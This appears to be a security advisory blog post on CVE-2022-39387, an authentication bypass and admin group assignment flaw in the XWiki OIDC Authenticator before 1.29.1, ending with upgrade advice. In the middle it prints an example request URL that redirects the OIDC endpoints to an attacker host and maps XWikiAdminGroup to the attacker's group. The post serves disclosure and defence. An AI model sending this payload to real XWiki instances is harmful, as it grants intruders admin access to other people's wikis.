The XWiki OIDC Authenticator is an essential part of XWiki, a popular web-based open-source application for creating and managing wikis. It provides various tools to manipulate the OpenID Connect protocol in XWiki, allowing seamless integration with OpenID Providers everywhere. However, a serious vulnerability has been discovered in the XWiki OIDC Authenticator prior to version 1.29.1, which allows for authentication bypass and arbitrary group assignment. This post will discuss the exploit details and provide guidance on how to mitigate this vulnerability.

Exploit Details

CVE-2022-39387 pertains to an authentication bypass vulnerability in the XWiki OIDC Authenticator. In versions prior to 1.29.1, even if a wiki has an OpenID provider configured using its xwiki.properties file, it is still possible for an attacker to provide a third-party provider with its details by using request parameters in the authentication process.

By specifying their own provider through the "oidc.endpoint.*" request parameters, or by using an XWiki-based OpenID provider with "oidc.xwikiprovider", an attacker can effectively bypass the XWiki authentication altogether. Moreover, by providing a specific group mapping through "oidc.groups.mapping" in the request, the attacker's user will automatically become part of the XWikiAdminGroup, granting them admin privileges.

The following code snippet demonstrates the workaround exploit

https://vulnerable.xwiki.instance.com/?oidc.endpoint.authorization=http://attacker.example.com/auth/endpoint
&oidc.endpoint.token=http://attacker.example.com/token/endpoint
&oidc.endpoint.userinfo=http://attacker.example.com/userinfo/endpoint
&oidc.groups.mapping=%7BXWiki.XWikiAdminGroup=attacker_group%7D

Original References

- XWiki OIDC Authenticator: https://extensions.xwiki.org/xwiki/bin/view/Extension/OIDC/OpenID%20Connect%20Authenticator%20Application/
- XWiki CVE-2022-39387 Patch: https://jira.xwiki.org/browse/OAUTH-321
- XWiki OIDC Authenticator 1.29.1 Release Notes: https://extensions.xwiki.org/xwiki/bin/view/Extension/OIDC/OpenID%20Connect%20Authenticator%20Application%20Release%20Notes%201.29.1/

Upgrade and No Workaround

The only reliable way to address CVE-2022-39387 at this time is to upgrade the XWiki OIDC Authenticator to version 1.29.1. There is no workaround to this issue, and upgrading the authenticator is required to prevent potential unauthorized access and granting of admin privileges to a malicious actor with knowledge of the exploit.

You can download the XWiki OIDC Authenticator version 1.29.1 from the following link: https://extensions.xwiki.org/xwiki/bin/view/Extension/OIDC/OpenID%20Connect%20Authenticator%20Application/

Conclusion

CVE-2022-39387 is a critical vulnerability allowing authentication bypass and using an XWiki-based OpenID provider or trading arbitrary groups with admin privileges to the attacker's user. To protect your XWiki instances, it is highly recommended that you upgrade the XWiki OIDC Authenticator to version 1.29.1 as soon as possible. Always be proactive in maintaining security updates and stay informed with the latest patches and breakthroughs in the software world.

Timeline

Published on: 11/04/2022 19:15:00 UTC
Last modified on: 11/07/2022 19:12:00 UTC